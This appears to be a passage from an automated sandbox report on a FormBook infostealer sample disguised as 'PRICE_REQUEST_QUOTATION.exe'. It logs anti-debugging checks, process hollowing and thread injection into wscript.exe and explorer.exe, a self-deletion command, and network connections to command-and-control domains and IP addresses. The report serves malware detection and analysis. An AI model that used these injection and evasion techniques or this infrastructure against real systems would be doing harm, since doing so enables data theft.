Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h] 17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD46A7 mov eax, dword ptr fs:[00000030h] 17_2_04CD46A7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6AAB0 mov eax, dword ptr fs:[00000030h] 17_2_04C6AAB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6AAB0 mov eax, dword ptr fs:[00000030h] 17_2_04C6AAB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8FAB0 mov eax, dword ptr fs:[00000030h] 17_2_04C8FAB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h] 17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h] 17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h] 17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h] 17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h] 17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CE4257 mov eax, dword ptr fs:[00000030h] 17_2_04CE4257
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6766D mov eax, dword ptr fs:[00000030h] 17_2_04C6766D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0B260 mov eax, dword ptr fs:[00000030h] 17_2_04D0B260
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0B260 mov eax, dword ptr fs:[00000030h] 17_2_04D0B260
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28A62 mov eax, dword ptr fs:[00000030h] 17_2_04D28A62
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9927A mov eax, dword ptr fs:[00000030h] 17_2_04C9927A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h] 17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h] 17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h] 17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h] 17_2_04C8A61C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h] 17_2_04C8A61C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C73A1C mov eax, dword ptr fs:[00000030h] 17_2_04C73A1C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5E620 mov eax, dword ptr fs:[00000030h] 17_2_04C5E620
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0FE3F mov eax, dword ptr fs:[00000030h] 17_2_04D0FE3F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C937F5 mov eax, dword ptr fs:[00000030h] 17_2_04C937F5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h] 17_2_04C61B8F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h] 17_2_04C61B8F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D0D380 mov ecx, dword ptr fs:[00000030h] 17_2_04D0D380
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8B390 mov eax, dword ptr fs:[00000030h] 17_2_04C8B390
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h] 17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h] 17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h] 17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D1138A mov eax, dword ptr fs:[00000030h] 17_2_04D1138A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D25BA5 mov eax, dword ptr fs:[00000030h] 17_2_04D25BA5
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5DB40 mov eax, dword ptr fs:[00000030h] 17_2_04C5DB40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6EF40 mov eax, dword ptr fs:[00000030h] 17_2_04C6EF40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28B58 mov eax, dword ptr fs:[00000030h] 17_2_04D28B58
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5F358 mov eax, dword ptr fs:[00000030h] 17_2_04C5F358
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5DB60 mov ecx, dword ptr fs:[00000030h] 17_2_04C5DB60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6FF60 mov eax, dword ptr fs:[00000030h] 17_2_04C6FF60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h] 17_2_04C83B7A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h] 17_2_04C83B7A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D28F6A mov eax, dword ptr fs:[00000030h] 17_2_04D28F6A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h] 17_2_04C8A70E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h] 17_2_04C8A70E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D1131B mov eax, dword ptr fs:[00000030h] 17_2_04D1131B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h] 17_2_04CEFF10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h] 17_2_04CEFF10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h] 17_2_04D2070D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h] 17_2_04D2070D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h] 17_2_04C54F2E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h] 17_2_04C54F2E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8E730 mov eax, dword ptr fs:[00000030h] 17_2_04C8E730
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00409B50 LdrLoadDll, 3_2_00409B50

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe Network Connect: 154.208.173.139 80
Source: C:\Windows\explorer.exe Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe Network Connect: 109.106.246.165 80
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe Network Connect: 185.107.56.60 80
Source: C:\Windows\explorer.exe Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe Domain query: www.patrickandmaxine.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1060000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Memory written: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 3472
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: explorer.exe, 00000006.00000000.281211852.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000000.311360069.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY